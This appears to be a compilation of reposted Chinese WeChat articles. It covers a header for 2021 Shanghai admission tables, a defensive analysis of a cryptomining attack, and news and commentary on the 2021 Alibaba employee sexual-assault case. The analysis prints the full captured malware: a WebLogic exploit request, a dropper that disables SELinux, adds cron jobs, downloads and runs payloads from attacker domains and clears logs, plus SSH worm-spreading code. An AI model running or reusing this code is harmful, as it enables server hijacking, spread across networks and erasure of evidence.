注:以下数据经人工统计完成,旨在数据分享,不对任何高中做出评价。若有错漏,欢迎指正。
2021年上海高中11校综评录取人数总表
2021年上海高中复交综评录取人数总表

转自:https://mp.weixin.qq.com/s/-Jylb5PTlBL_uOhhb6PDGA
分享个人经验,保留阅读记录,做时间的朋友
注:以下数据经人工统计完成,旨在数据分享,不对任何高中做出评价。若有错漏,欢迎指正。
2021年上海高中11校综评录取人数总表
2021年上海高中复交综评录取人数总表
转自:https://mp.weixin.qq.com/s/-Jylb5PTlBL_uOhhb6PDGA
转自:https://mp.weixin.qq.com/s/3Rxq7qoQgz0nvVfbxYRY3w
温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。
挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。但可惜的是,它能赚钱。用别人的机器去赚钱,更是很多人梦寐以求的,所以挖矿脚本屡禁不止。
有钱的地方,就有技术。但反过来并不一定成立。
牢记这个准则,就能够心平气和的学习新技术,而不是气急败坏的纠结为啥没钱。
下面是一个http的报文。
GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec(new String[]{'/bin/sh','-c','export src=logic;curl -fsSL t.bb3u9.com/ln/core.png?logic|bash'});"); HTTP/1.1
Host: 20*.10*.8*.1*9:7001 #已脱敏
User-Agent: curl/7.55.1
Accept: */*
Content-Type:application/x-www-form-urlencoded; charset=utf-8
很简单,waf防火墙拦截到相关包,一眼看上去就不正常。从关键字com.tangosol.coherence.mvel2.sh.ShellSession
可以得知,这个请求,是想要利用Weblogic的远程代码执行漏洞。
这样的漏洞有很多很多,数不胜数,比如它可以通过redis进入。我们不必关注这些漏洞,默认它已经利用成功了。我们只看挖矿脚本是怎么部署到你的机器上的。
在java中,当然要调用它的Runtime类库,如果你的应用程序是运行在root用户的,那它什么事情都能干。
这就是为什么要求你线上部署的应用,都用权限低一点的账户,比如xjjdog去运行,而不是不要命的把root账户给开放。
exec函数带了三个参数。
/bin/sh
意味着它要执行一个shell脚本-c
指明了要执行的命令狡猾的人都喜欢带面具,而狡猾的脚本都喜欢改后缀。看起来是个png,但它是个脚本。
接下来摘下它的伪装,看一下它的真面目。
curl http://t.bb3u9.com/ln/core.png?logic > core.png
查看core.png
文件中的内容。不错,很长一段脚本。
#/bin/bash
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
murl1="http://t.bb3u9.com/ln/a.asp"
murl2="http://t.jdjdcjq.top/ln/a.asp"
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
echo "">/var/spool/cron/root
echo "">/var/spool/cron/crontabs/root
if [ "`whoami`" == "root" ];then
cronpath=/etc/crontab
Xpath=/.Xl1
else
cronpath=/var/spool/cron/`whoami`
Xpath=~/.Xl1
fi
if [ ! -d "$Xpath" ];then
mkdir $Xpath
echo "$[$RANDOM%60] * * * * root $cmd1" >> $cronpath
echo "$[$RANDOM%60] * * * * root $cmd2" >> $cronpath
uname -a|grep x86_64 && echo "$[$RANDOM%60] * * * * root ps aux|grep p.b69kq.com |grep -v grep || $Xpath -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda" >> /etc/crontab
export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
fi
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
按照常规,我们来一行行拆解它。
1)关掉selinux。setenforce 0是关闭的意思,2表示stderr,出错了不提示。接下来会通过写配置文件的方式,永久性的禁止selinux。
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
2)很良心的帮助清理一下系统内存
sync && echo 3 >/proc/sys/vm/drop_caches
3)构造guid,对机器进行标识
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
dmidecode命令,可以获取linux硬件相关的信息,会输出非常多的内容。-t 4表示只获取Process
方面的内容。然后过滤一下ID信息,使用sed命令截取并去掉空格。
ID: 57 06 05 00 FF FB 8B 0F
会变成。
57060500FFFB8B0F
然后使用ifcongig命令获取网卡硬件MAC信息。做同样的处理后获得另外一个串。这段脚本写的稍微有点问题,因为ifconfig的输出经常会改格式,但不影响计算hash。
sha256sum就是算出这样一个hash,然后赋值给guid。比如下面这个。
786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c
4)安装定时任务到crontab中
脚本选择了/.Xl1
目录作为真正的挖矿程序的存储目录。注意这三个字母,后面是l和1,并不是X桌面的配置目录。在真正的脚本
部分,我们可以看到下载的程序包地址是d.u78wjdu.com/ln/xr.zip
。
5)我们再来看一下下载的链接是什么样子的
cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
其中,src变量是在一开始就设置的,我们依次来还原一下。
export src=logic
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
gurl=$murl1?${src}_${cdate}
最终会拼成下面的字符串,可以说该有的信息都有了,能够区分出到底是哪一台机器了。
url?_20210722*root*host_iZ2ze5w0d1f4lplj3yuflcZ*786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c
$RANDOM
环境变量,是个神奇的环境变量。直接输出的话,将会得到一个随机值。cron脚本周期性的拉取最新的脚本执行,把真正的挖矿程序部署起来。
关于真实脚本的介绍,xjjdog在另外一篇文章中有详细的介绍。在这个场景下,最新的脚本就是http://t.bb3u9.com/ln/a.asp
,依然是改后缀的障眼法。
这个脚本显然比上面这篇文章介绍的要更加高级一些。脚本很长很长,就不贴了,你可以自己下载。它的主要意图,是下载一个叫做xr的程序,然后在马甲目录.Xl1中运行。xr程序才是挖矿的主要程序,其他的脚本,都是辅助它来运行的。下面是最主要的运行逻辑。
if [ ! -d "$Xpath" ];then
mkdir $Xpath
fi
cd $Xpath
if [ ! -f "./xr" ];then
uname -a|grep x86_64 && (curl -fsSL d.u78wjdu.com/ln/xr.zip||wget -q -O- d.u78wjdu.com/ln/xr.zip)>xr.zip && tar xf xr.zip && rm xr.zip
fi
uname -a|grep x86_64 && ps aux|grep p.b69kq.com |grep -v grep || ./xr -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda
要保证脚本的安全,怎么能少得了chattr命令。很多人遇见加了i参数的文件,不能被删除,就傻眼了。其实是可以通过-i
参数去掉这个属性的。
chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
脚本还会通过nc命令,拷贝rsa公钥到你的每个用户目录下面,把你做成事实上的肉鸡,实现免密登录。关于nc这把瑞士军刀,我们也有过介绍。
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" $file/.ssh/known_hosts); do echo exit |nc -w 1 -n -v $h 65529 && ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &' & done
fi
fi
done
这份脚本,还会病毒式的传播。localgo
函数,通过从你的ps
进程,history
文件,还有hosts
配置,拿到用户列表、主机列表端口、rsa密钥等,就可以批量的去尝试登录并传播这份脚本。当然,上面的xr程序会监听65529
的端口,如果判断主机已经中招了,就不再继续探测。
能用65529
这个端口,本身就够骚气的了,有几台机器能够达到上限65535呢?
localgo() {
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
echo exit |nc -w 1 -n -v $host 65529 && ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &"
done
done
done
done
}
最后,脚本还不忘汇报一下,形成完美的闭环。
reurl=http://t.bb3u9.com/ln/report.asp?*`whoami`*`hostname`*${guid}*${isdocker}*${pyver}*${isxrfile}*${hashrate}*${mip}
(curl -fsSL $reurl||wget -q -O- $reurl)|bash
如果你发现你的机器不明原因发热,务必排查一下有没有挖矿程序。虽然你的服务器摆在那里也没什么用,但用着你的电费,收益却给别人,相信你一定会嫉妒的要命。那么别犹豫,kill -9送给它,别忘了清理cron。
重装是我们的秘密武器,仅次于重启。嫌麻烦的话,就这么干吧!
转自:https://mp.weixin.qq.com/s/oo5z7XqPBp9ZdNx8qsYkaA
转载自公众号:21世纪经济报道(ID:jjbd21)
阿里女员工在济南出差期间被侵犯一事仍在发酵。
今日凌晨,阿里巴巴董事会主席兼CEO张勇在阿里内网公布了“女员工被侵犯”的阶段性内部调查结果和处理决定:
同城零售事业群总裁李永和和HRG徐昆引咎辞职;
阿里巴巴首席人力资源官童文红记过处分;
涉嫌男员工被辞退,永不录用,其是否存在违法行为,警方正在调查取证。
“半夜里,内网上仍然文字汹涌。大家对事件的高度关注,不仅是对受到伤害的同学的同情和关爱,更是对背后折射出阿里文化问题的痛心疾首。”张勇表示,事件对这位女员工造成了巨大的伤害,无论警方的调查结果如何,“我们会尽全力关心和照顾好她。”
涉嫌男员工和女同事在酒醉状态下有过度亲密行为,严重违反公司规定,予以辞退,永不录用。关于他是否有强奸或者猥亵等违法行为,警方正在调查取证。
同城零售事业群总裁李永和(老鼎)和同城零售事业群HRG徐昆(丁冬)引咎辞职。内部公告认为,李永和作为事业群总裁,在这件事上的敏感性、重视和投入程度远远不够,没有主动作为,徐昆也没有起到事业群HRG关键决策的作用,为此应承担领导责任。
阿里巴巴集团首席人力资源官童文红受到记过处分。在整个事件处理过程中,HR团队对人的关注、关怀不够,理性多了,感性少了,缺乏感同身受。同时,缺乏应急响应体系和存在严重的判断失误,在涉嫌违法的情况下,未能第一时间将当事人停职。“这种种现象的背后是HR文化体系和能力的建设出现了重大问题。”
张勇表示,阿里是所有阿里人的阿里,之所以痛,是因为爱,发生这样的事情是全体阿里人的屈辱。“我们必须重塑,我们必须改变。改变必须从每个人做起,但是首先必须从领导者做起,从我做起。请大家拭目以待。”
这份内部公告中,阿里提到,接下来将继续在三个方面反思和行动:
1、开展对于包括性骚扰在内的员工权益保护的培训和调查,开通专门举报通道。员工的举报,将在确保隐私受到充分保护的前提下,由专人跟进。
2、对性骚扰零容忍,由外部专家和员工代表共同制定《反性骚扰行动准则》。
3、旗帜鲜明地反对丑陋的陪酒文化,不分性别,阿里巴巴无条件支持员工拒绝陪酒。
阿里超6000名员工联合倡议:建立职场反性骚扰制度,严查事件过程
昨日,一封名为《Aliren help Aliren,6000名阿里人关于807事件的联合倡议》在社交媒体中转发。前述倡议书中提到,阿里巴巴员工自发建立了一个讨论群,名为“勇敢牛牛帮助小组”,该小组称将借此事件,推动员工、特别是女性员工职场反性骚扰/反性侵制度的建立。
据澎湃新闻向阿里求证,前述联合倡议书内容属实。针对“807事件”,阿里巴巴建立了“勇敢牛牛帮助小组,在这个小组中,阿里巴巴员工为职场反性骚扰/反性侵制度的建立征集了很多意见。
这封署名为“勇敢牛牛员工帮助小组”的联合倡议中提到,自发聚集在一起的目标是通过对事件的持续关注,从而推动事件真相的彻查、为阿里组织生态的改变提供建议,并推动落地。目前该群组内加入的阿里员工已超过6000人,包括阿里各条线的工作人员。
该倡议希望公司正视当事人在内网提到的两点诉求,即开除嫌疑犯,永不录用;给予当事人带薪长假,(建议先给当事人3个月带薪假期,后续由专业心理机构评估是否需要延长),给予足够的心理恢复及支持。
倡议表示,为当事人及家属提供中长期优质免费的心理咨询服务及回访,直至受害人及家属确认走出阴影,不再需要此类支持。
倡议中提及,希望公开调查组成员、运作机制,并及时披露信息,严查事件过程,给当事人和员工一个交代,令涉事高管正面回应质疑,并作详细解释。此外,在女性员工职场反性骚扰制度、倡导HR不唯上更向人看、CPO与员工建立长期沟通机制等方面,这份倡议也提出了具体诉求。
倡议同时公布了目前小组的工作进度,公司正在筹备建立《员工反性骚扰/反性侵保护机制》,诚邀大家积极提出建议。
华联当事人:席间有搂抱,但没有猥亵
作为涉事商家,8月8日,济南华联超市发布声明称,就该事件华联超市会全力配合警方工作,涉嫌员工现已停职正在接受警方调查。华联超市对于任何违法犯罪行为始终保持零容忍的态度,目前超市已成立专门调查组对事件进行调查,也将密切关注警方调查进展和结果。
据武汉晨报,涉事员工张某告诉记者,目前他正在派出所接调查,对于阿里女员工周某的指控他认为不实,“那天吃饭只是普通饭局,我没有做过分动作。”其称,自己并没有摸过、亲过周某,说猥亵是诬陷,“我现在觉得自己比较冤屈,猥亵是诬陷,我相信警方会秉公执法,还我一个清白。”
另据新京报8月8日晚间消息,记者对话济南华联超市涉事员工张某。对此,张某予以否认,“在酒桌上正常喝酒,中间肯定有搂抱的过程”。女员工称,张某在她醉酒后扶她到其他包间长达20分钟,对此张某予以否认。目前,济南警方在调查取证。
南财快评:让女性以性为耻的文化,是施暴者最强大的帮凶
网曝阿里巴巴员工被上司性侵,据当事人称,内部处理过程中,当事人不仅被要求反复举证自证,同时也感受到各种社会压力,最终当事人只能以在公司场合公开举报。
震撼全网的,除了性侵事件本身,更多的是当事人维权过程遇到的漠视和困难。作为受害人,不论是在警方调查取证还是在企业内部处理过程中,通常都被被要求自己证明自己受到了伤害,个人隐私不断反复的暴露。就社会环境而言,对受害者而言是反复的痛苦。为了证明自己受到了侵害,需要把还在流血的伤口一遍遍的扒开来给调查组看,直到最后被迫向全网公开。难怪有网友感叹,到了数字时代,还有这种为了伸冤不得不滚钉板的小白菜呀。
但凡注意到中国社会对性议题的敏感度,就可以发现,不论是酒桌文化,还是企业各种迎新文化。在目前的社会环境里,似乎男人谈性是一种幽默,女人谈性就是女人的不是,哪怕是自己因性受害也不好拿出来大声宣讲,在文化上,多少会认为女人这样做不体面。女人谈性的社会空间,有着一本看不见的性别经济账。
所以一旦发生性侵害,受害女性为了伸冤需要付出更多的代价,男性施暴的成本极低,女性伸冤的成本极高,这本身就是一种在文化经济账面上的社会惩罚。我们可以相信,有多少受性侵的女人因为要顾及颜面和名声,不得不忍气吞声。以性来羞辱女性的文化,不啻为施暴者最强大的帮凶。
其实中国在法律保护方面是非常充分的,根据我国《刑法》对强奸罪的规定,以暴力、胁迫或者其他手段强奸妇女的,处三年以上十年以下有期徒刑,奸淫不满十四周岁的幼女的,以强奸论,从重处罚。
早在2005年,性骚扰也写进了《中华人民共和国妇女权益保障法》,该法规定,妇女受到侵害,有权向单位和有关机关投诉。2012年4月28日施行的《女职工劳动保护特别规定》第十一条规定:在劳动场所,用人单位应当预防和制止对女职工的性骚扰。同时,第十五条规定:用人单位违反本规定,侵害女职工合法权益,造成女职工损害的,依法给予赔偿;用人单位及其直接负责的主管人员和其他直接责任人员构成犯罪的,依法追究刑事责任。
其实警方在处理相关案件制定了相应的当事人保护办法。企业除了需要预防和制止对女职工实施性侵害,也应该在内部调查过程中制定当事人保护制度,避免在内部调查的过程中对女职工进行二次“性骚扰”。根据中国纺织工业联合会编制的《健全职场性骚扰防治机制企业指导手册》对职场性骚扰的定义指出,“发生在招聘或工作场所的、违背对方意愿的、具有性含义的、使求职者或员工处于某种不利地位或难以忍受的敌意环境中的侵权行为”均为职场性骚扰,所以,性骚扰在内部调查过程中不断被要求自曝隐私,本身就不是调查中所必须的!
2015年麦肯锡全球研究院发布《平等的力量:性别平等如何为全球经济创造12万亿美元的增长》的报告,该报告指出,全球范围内缩小职场的性别差距,能够促使妇女在2014-2025年间的全球GDP增长做出双倍的贡献,如果女性参与经济活动的机会与男性一致,那么有望在2025年全球GDP出现28万亿美元的增长,相当于美国与中国当时经济总量之和。麦肯锡将职场性别平等、关键服务与经济机会的驱动因素、法律保护和政治声音、人身安全与自主能力,作为判断性别平等的关键指标。保护职场女性人身安全已经不仅仅是企业社会责任任务和品牌商誉,更是企业的经济成败本身。
三孩时代,保障女性职场权益,不仅仅是延长带薪产假那么简单,给予女性充分的身体安全感、打破职场舆论环境中的男女双标,建构全流程性别友好的健康职场,才是重中之重。(作者任珏为特约作者)
来源丨21世纪经济报道综合自南财快评(作者 任珏)、环球网、澎湃新闻、武汉晨报、新京报等
转自:https://mp.weixin.qq.com/s/QW0dcOos-Vj505swPCs67w
8月7日,网传阿里一女员工被要求出差山东济南,在陪酒被灌醉后遭到猥亵。随后,直属领导为之开好房间,不过期间四进四出,当女员工醒来之后发现自己可能遭遇了强奸。
她在报警并看完监控后,在阿里内部向多位领导反映情况无果,遂前往食堂发传单,却被保安抢走,但消息不胫而走。
事件过去了10天,终于在网上发酵之后,阿里连夜对媒体回应称:决不容忍,全力配合警方,涉嫌员工已停职接受警方调查。
昨日凌晨,阿里巴巴董事长兼CEO逍遥子也发表声明称“震惊、气愤、羞愧”,其中透露的一个重要信息是,他也是昨晚才知道此事,并不比公众早。也就是说,这件事过了10天,根本就没到核心管理层那里,而是在中途就被拦下了。
事件发生后,大量阿里员工和前员工在社交媒体对此事表达了自己的不满,内部更是有数千人组建钉钉群支持受害女同事。
事实上,阿里与“低俗”、“性骚扰”这些词汇并非第一次产生联系,此前多次出现过类似指责。比如2018年5月,阿里就被指员工入职时被要求玩低俗的破冰游戏,回答涉及性方面的各种私密问题,这些问题尺度之大,包括“第一次是什么时候、自己喜欢什么体位”等,阿里巴巴官方很快对此进行了辟谣与否认。
另一方面,这家公司的创始人马云在2017年5月10日的阿里集体婚礼上说,爱是做出来的。
后马云时代,阿里在管理上面临的挑战变得更加艰巨,尤其是在月饼门事件和蒋凡事件发生后,公司价值观也开始受到越来越多的质疑。
值得一提的是,去年与今年曝出负面事件都处于业务转型节点上。
去年是天猫信息流大改版关键时间,内容视频化以应对拼多多和字节猛攻。作为淘宝直播的主要策划者蒋凡,因随后的负面新闻直接退居幕后。此外,悉心培育出的头部主播张大奕也随之走下神坛。
今年是阿里同城零售的破局之年,过去一年内控股高鑫零售(旗下有大润发与欧尚两大品牌)、苏宁,线下布局几近完成时,突然曝出淘鲜达女员工的负面新闻,实在流年不利。
最新进展
8月9日,阿里巴巴董事会主席兼CEO张勇在阿里内网公布了“女员工被侵犯”的阶段性内部调查结果和处理决定:同城零售事业群总裁李永和和HRG徐昆引咎辞职,阿里巴巴首席人力资源官童文红记过处分,涉嫌男员工被辞退,永不录用,其是否存在违法行为,警方正在调查取证。
去年2月,张勇在2020财年电话会议中表示,本地生活服务“不是一个业务,更多的是支持消费的基础”,为此后不断调整业务线埋下了伏笔。
6月组织架构大调整后,围绕同城零售形成了天猫超市+淘鲜达+盒马鲜生的业务组合,其中“淘鲜达”品牌承担了一大重任:盘活规模数十万的商超生态,形成一小时达,其重要性自不待言。
“建新城”与“拆旧城”是阿里新零售战略的两条主线,而淘鲜达属于“拆旧城”部分,即用数字化改造线下商超传统零售模式。因而,与阿里商超生态伙伴互动是该部门的常务之一。
刚刚过去的七月,阿里刚刚完成组织架构升级,重点在于调整本地生活业务,而淘鲜达即属于该业务线下。李永和(老鼎)担任本地生活公司CEO,原CEO王磊卸任另有任用。这次调整多被外界解读为应对美团的同城零售,不幸的是一个月后业务掌舵人老鼎受到此次负面事件波及。
根据以上时间线,不难发现,阿里本地服务刚刚完成新一轮整合,此时曝出负面新闻将严重打乱其同城零售布局节奏。
据受害人介绍,她曾层层向上反映情况,从而牵扯出诸多高层,具体包括:曲一的直属领导,淘鲜达LKA(地方性重点客户)负责人;淘鲜达BU负责人;同城BG负责人等,整个同城零售-淘鲜达业务线上的高管像蚂蚱一样被受害人串在了一起。
其中最受关注的是受害人的直属上级——“曲一”,这是王某花名。
光子星球了解到,曲一是淘鲜达华北区商家运营组负责人,在2014年8月到2016年5月,担任城市经理,负责饿了么南宁高校团队搭建和业务开展。结合履历与爆料信息,王某疑似拥有七年的商家与带队伍经验。
在2017年成立淘鲜达品牌后,阿里本地服务不断打通,随着业务开展,有知情人向光子星球表示,饿了么一度被美团压制,且带有外包色彩,一些员工看到集团成立淘鲜达,便转岗到新业务部去,王某可能便是其中一员。
8月的这起负面事件至少暴露了两个问题,一个是马云退休后,新六脉神剑之下,阿里的公司文化与治理受挫;另一个是事件波及的大多是To B业务骨干,在昔日中供铁军步入中年,离开阿里后,如何打造新生代“铁军”变得极为重要。
阿里巴巴的企业文化受马云影响颇深,而武侠与酒文化是两大重要元素,因之方才有如下对新阿里人的说法:一年香,三年醇,五年陈。
在特定历史时期,这套企业文化衍伸出的方法论一度让阿里迅速崛起。
根据经济观察报报道,2014年5月,在阿里巴巴宣布提交赴美上市招股书的三天后,马云从上海回到杭州,参加完集体婚礼和支付宝年会,他和公司几个高管就在自己家里喝茅台酒回忆往事。
马云当时回忆,自己一直念念不忘的是创业之初在一次与煤老板的饭局上,对方说如果马云能够一口气喝掉9杯白酒,他就会承诺投资马云50万元。马云很犹豫:“可是我根本不会喝白酒啊!”这时候他的秘书拿过酒杯,决定替老板挡下喝酒的要求,最后她喝了27杯。
阿里从最初发展业务不得不喝酒,到后面开始逐渐开始形成自己的酒文化,尤其在销售层面普遍存在。
陈放曾是中供铁军的一位骨干,他告诉光子星球,阿里的确有非常丰富的酒文化,例如众人皆知的PK文化,“每次开启动会就绑着红头绳,现场杀个鸡,喝血酒。”如今陈放即便人过中年,白酒还是按斤来喝的。
饮酒能放大人的情绪,陈放回忆说,自己曾经一度很不习惯绑红绳、喝红酒那套做法,几次PK时自己还忍不住笑场。可当自己带队伍时,他发现酒的确是个好东西,人的情绪会变得很柔软,又很亢奋,“我们去年9月团建的时候,晚上喝了场大酒,大家释放了情绪,团队迅速拧成了一股绳”。
不过他也坦诚,除了酒文化之外,当年中供铁军招人的指向性也是后来成功的一大因素。
“我是农村出来的,当时铁军特别喜欢招我们这种苦大仇深,又有上进心的年轻人。”这一点在公开信息中颇为常见。
早期骨干干嘉伟在乌镇做过搬运工,利用双轨制倒腾过钢材。1988年,他赚得盆满钵满,加之年少轻狂,喜欢与狐朋狗友到舞厅消遣,如果打烊还玩儿得不尽兴,阿干会从屁股兜里掏出一沓钱,拿出200元延长两个小时表演时间。
直到一年后一切归零,浪子方才回头。
“中供铁军团队其实既狼性,又比较土”,鲁斯曾是中供铁军的一位区域经理,他告诉光子星球,从外面看是铁军,很狼性,可自己进去之后第一个感觉是怎么这么土。随后他总结说:“阿里不是大家想当然的那么高大上,其实有非常草根的一面。”
到底是什么让这些渴望财富的年轻人变得有战斗力?外界大多认为是六脉神剑,其实直接原因来自于绩效制度与团队氛围。
阿里曾有一套设计精巧的制度,这套名为“金银铜牌制”的业绩算法,被许多老中供人称道。简言之,就是上个月你的业绩对应的提成决定了你下个月的佣金系数,从而避免了故意累积单子的瑕疵,还能不断激励他们连创新高。
现在阿里的To B销售人员能力上不输过去中供,陈放认为唯一差异是少了点“侠客精神”。比如看到同伴三个月开不出单子,会把自己的客户介绍给他。他总结道:过去中供铁军会一起住、一起吃饭,彼此间的情感与默契度很高。
一位中供铁军骨干俞朝翎的经历颇能印证这一说法,“白天跑客户大家分开,晚上其实很孤独。我们吃在一起,住在一起。你的短裤什么颜色,平时有哪些丑陋的习惯,我们都知道。”他也认为“好的说辞、灵感都是在吃饭、喝酒、睡觉的过程当中才会迸发出来”。
时至今日,阿里中供铁军已经淡出历史舞台,但是这个群体所留下的酒文化却在阿里扎根,并开始散布到很多其他公司。
比如出身于阿里销售体系的滴滴出行创始人程维,一直都很喜欢喝酒,在滴滴与快的合并之后,他经常约原快的打车CEO吕传伟在北京上地附近喝啤酒撸串。
程维和团队一起喝酒,就是释放压力、嬉笑怒骂。滴滴出行高级副总裁朱景士曾对《中国企业家》如此评价程维喝酒:“有些人喝酒是为了应酬,有些人喝酒那一刻是享受,他属于后者,我属于前者。”
在旧六脉神剑中,充满“利他”色彩,即便是996、狼性,终归还是有一套侠客精神兜底。而新六脉神剑显然更具现代性,但整体上开始往“利己”转向,譬如“此时此刻,非我莫属”。带来更高效的同时,我们也能看到阿里的企业文化已经不复往日。
旧六脉神剑 |
新六脉神剑 |
客户第一:客户是衣食父母 |
客户第一,员工第二,股东第三 |
团队合作:共享共担,平凡人做非凡事 |
团队合作:因为信任,所以简单 |
迎接变化,勇于创新 |
唯一不变的是变化 |
诚实正直,言行坦荡 |
今天最好的表现是是明天最低的要求 |
乐观向上,永不放弃 |
此时此刻,非我莫属 |
一位阿里巴巴员工告诉光子星球,此事传递出极为不好的价值观,女同事合法合规诉求得不到应有的重视和答复,再联想到月饼门事件,这背后是阿里价值观的双标。“普通员工做错了事,哪怕再小都要被严惩。但老板们做了明显越界甚至违法的事,却一次又一次被原谅和包庇。公司怎么做,大家都看在眼里,这样下去阿里的价值观还有谁会信呢?”
这件事真正可怕的地方在于,那些领导之所以一直袒护受害人的直属上级曲一,是因为这种事在他们眼中已经见怪不怪,或者说他们本身就是带来这种风气和职场环境的推动者。
一家创业公司前员工告诉光子星球,他所在公司的上级领导此前在阿里巴巴职级是P8,来到公司以后将以前的做法带到新团队,经常对女下属动手动脚,催进度时站在女同事后面直接搭人家肩上,摸对方头发,当时看女同事没有很大反应就没想太多。
“部门聚餐,稍微喝多之后就众目睽睽之下把手放女同事大腿上。之前总觉得是个例,后来离职以后再回想起来,就越想越恶心,这就是环境问题,如果我一直呆在那里,不知道会不会也变成这样?”上述人士说。
对于阿里而言,酒文化是成长过程中逐渐形成的,它既是过去成功的因素之一,也是未来制约公司走上更高舞台的重要因素,阿里别无选择必须摒弃。
但另一方面,在转向To C多年后,如今阿里正深入线下重回To B,这种销售导向型业务,又很难真正不碰酒桌。
至少在回归线下以后,机械性地套用过去中供铁军的方法论已经不太适用了。更亟待解决的问题是,如今这套偏向工具理性的企业文化频频爆雷,似乎表明“新六脉神剑”不如过去那么切中时代,束缚人性了。
此外,阿里女员工事件曝发于互联网线下化的浪潮中,巨头们动辄“改变传统”、“颠覆过去”、“赋能行业”,却连酒局应酬也无法抵御,实在有些难以自圆其说。像阿里、美团、字节等销售型公司,在不断灌输“八股文”之时,恐怕还得补一补人间烟火之课。
转自:https://mp.weixin.qq.com/s/Jlz1fAVjk1-L6FhQgtezuw